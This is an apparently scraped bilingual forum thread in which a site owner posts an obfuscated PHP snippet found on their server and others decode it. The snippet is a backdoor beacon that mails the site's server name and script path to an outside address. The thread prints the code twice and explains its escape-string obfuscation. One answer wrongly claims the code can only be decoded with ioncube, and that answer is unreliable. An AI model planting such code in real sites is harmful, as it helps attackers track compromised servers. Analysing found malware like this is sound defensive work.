有谁知道这段PHP代码的作用吗?
我发现这个嵌入在我网站上的 php 文件中,谁能告诉我它的作用吗?
$x0b="\x6da\x69l";
$ms = $_SERVER["S\x45R\126\105\x52_\x4e\101\x4dE"].$_SERVER["\123\x43R\111\x50\124_NA\x4d\105"];
$sub = "\x73\x68\145\x6cl\x20\076\076 :\x20" . $ms;
$o = array ("\x6fm","\164ma\151","\152\x5f\141\155\x72\x31","\x40\x68\x6f","\154.\x63");
$ee = $o[2].$o[3].$o[1].$o[4].$o[0];
$send = @$x0b($ee,$sub,$ms);
I Found this embedded in a php file on my site, can anyone tell me what it does?
$x0b="\x6da\x69l";
$ms = $_SERVER["S\x45R\126\105\x52_\x4e\101\x4dE"].$_SERVER["\123\x43R\111\x50\124_NA\x4d\105"];
$sub = "\x73\x68\145\x6cl\x20\076\076 :\x20" . $ms;
$o = array ("\x6fm","\164ma\151","\152\x5f\141\155\x72\x31","\x40\x68\x6f","\154.\x63");
$ee = $o[2].$o[3].$o[1].$o[4].$o[0];
$send = @$x0b($ee,$sub,$ms);
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(5)
它创建了 4 个变量。第一个变量 $x0b 是要使用的函数的名称“mail”。
最后 3 个变量是电子邮件的发送对象、主题和邮件正文。
你知道你被黑了:)
It creates 4 variables. The first variable, $x0b, is the name of the function to be used, "mail".
The last 3 variables are who to send the email to, the subject and the mail body.
You know you've been hacked :)
看起来很邪恶!该脚本尝试向 [email protected] 发送电子邮件。
@$x0b执行名称为 $x0b 的函数,其中\x6da\x69l是“mail”,@ 会抑制任何错误。接收者
$ee为[电子邮件受保护]邮件包含
SERVER_NAME和来自$_SERVER[]变量的SCRIPT_NAME。您可以使用 codepad 打印出字符串。
字符串编码为
S\x45R\126\105\x52_\x4e\101\x4dE。S只是纯文本。\x45是十六进制编码,\126是字符数。Looks evil! The script tries to sending an email to [email protected].
@$x0bexecutes the function with name from $x0b where\x6da\x69lis "mail" and @ suppresses any errors.Receiver
$eeis[email protected]The mail contains
SERVER_NAMEandSCRIPT_NAMEfrom the$_SERVER[]variable.You can use codepad to print out the strings.
The strings are encoded
S\x45R\126\105\x52_\x4e\101\x4dE.Sis just plaintext.\x45is hex encoded and\126is a char number.这是非常简单的 ASCII 混淆,并且可以非常简单地逆转。
\x + [0-9] 基本上是字母、字符或数字的 Ascii 形式。
任何用双引号括起来的字符串都将被解释为 ASCII 字符,例如:
查看下面的 ASCII 表,我们查看的是 Hx 列,因为这些是十六进制字符代码,所以现在我们可以使用它来在十六进制字符串中构建一个函数名称并像这样调用它:
然后使用该变量来调用一个函数,如下所示:
一旦您了解了如何使用 ASCII 表示,就非常简单了。
This is pretty simple ASCII obfuscation and can be reversed quite simply.
\x + [0-9] basically is the Ascii form of a Letter, character or digit.
Any string wrapped within double quotes will be interpreted for ASCII chars, for example:
Looking at the ASCII table below were looking at the Hx column, as these are hexadecimal character codes, so now we can use this to build up a function name in a hex string and call it like so:
and then use that variable to call a function like so:
Quite simple once you understand the howto use ASCII Representations.
它将包含 PHP 脚本位置的电子邮件发送到地址 [email protected]
该脚本是您应该付费的应用程序的一部分吗?网站许可证的用途?这将是一种检查未付费使用它的人的方法。或者它可能是后门的一部分,让某人控制您的服务器。
It sends an email containing the location of the PHP script to the address [email protected]
Is that script part of an application that you're supposed to have a paid site license for? This would be a way to check for people who use it without paying. Or it could be part of a backdoor that lets someone control your server.
我相信 PHP 代码本身已经被像 ioncube 这样的工具“混淆”(或编码)。
它只能通过相同的工具进行反混淆,尽管当在安装它的服务器上运行时,它会正常运行。
希望这有帮助
I believe the PHP code itself has been "obfuscated" (or encoded) by a tool like ioncube.
It can only be un-obfuscated by the same tool, although when run on the server it's installed on, it will run normally.
Hope this helps